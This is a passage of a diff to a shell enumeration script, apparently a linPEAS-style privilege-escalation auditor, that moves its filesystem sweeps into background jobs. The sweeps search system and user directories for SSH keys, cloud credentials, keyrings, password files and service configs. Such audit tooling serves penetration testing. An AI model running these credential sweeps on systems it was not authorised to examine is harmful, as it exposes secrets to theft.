$FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_VAR" ]; then printf $RED". "$NC; else printf $GREEN". 
"$NC; fi - FIND_TMP=$(eval find /tmp/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_TMP" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_OPT=$(eval find /opt/ $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_OPT" ]; then printf $RED". "$NC; else printf $GREEN". 
"$NC; fi - FIND_USR=$(eval find /usr/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_USR" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_MNT=$(eval find /mnt/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_MNT" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_LIB=$(eval find /lib/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_LIB" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_RUN=$(eval find /run/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_RUN" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_SYSTEMD=$(eval find /systemd/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_SYSTEMD" ]; then printf $RED". "$NC; else printf $GREEN". 
"$NC; fi - FIND_SYSTEM=$(eval find /system/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_SYSTEM" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_SYS=$(eval find /sys/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_SYS" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_SNAP=$(eval find /snap/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_VAR" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi + FIND_HOME=`eval_bckgrd "find $HOMESEARCH $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_PGP_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_PASSWORD_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` + FIND_ETC=`eval_bckgrd "find /etc/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_KNOCK_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` + FIND_VAR=`eval_bckgrd "find /var/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` + FIND_TMP=`eval_bckgrd "find /tmp/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_OPT=`eval_bckgrd "find /opt/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 
2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_USR=`eval_bckgrd "find /usr/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` + FIND_MNT=`eval_bckgrd "find /mnt/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_AUTOLOGIN_RELEVANT_NAMES -o $FIND_KNOCK_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_PGP_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_PASSWORD_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_LIB=`eval_bckgrd "find /lib/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_RUN=`eval_bckgrd "find /run/ $FIND_DOCKER_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_SYSTEMD=`eval_bckgrd "find /systemd/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` + FIND_SYSTEM=`eval_bckgrd "find /system/ $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_SYS=`eval_bckgrd "find /sys/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` + FIND_SNAP=`eval_bckgrd "find /snap/ $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` #MacOS - FIND_USERS=$(eval find /Users/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_PASSWORD_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_USERS" ]; then printf $RED". "$NC; else printf $GREEN". 
"$NC; fi - FIND_PRIVATE=$(eval find /private/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -O $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_PRIVATE" ]; then printf $RED". "$NC; else printf $GREEN". "$NC; fi - FIND_APPLICATIONS=$(eval find /Applications/ $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort) - if [ "$FIND_APPLICATIONS" ]; then printf $RED". "$NC; else printf $GREEN". 
"$NC; fi + FIND_PRIVATE=`eval_bckgrd "find /private/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_PGP_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_SYSTEMD_RELEVANT_NAMES -o $FIND_TIMERS_RELEVANT_NAMES -o $FIND_SOCKETS_RELEVANT_NAMES -O $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. 
'\\\$NC 1>&2;"` + FIND_APPLICATIONS=`eval_bckgrd "find /Applications/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o 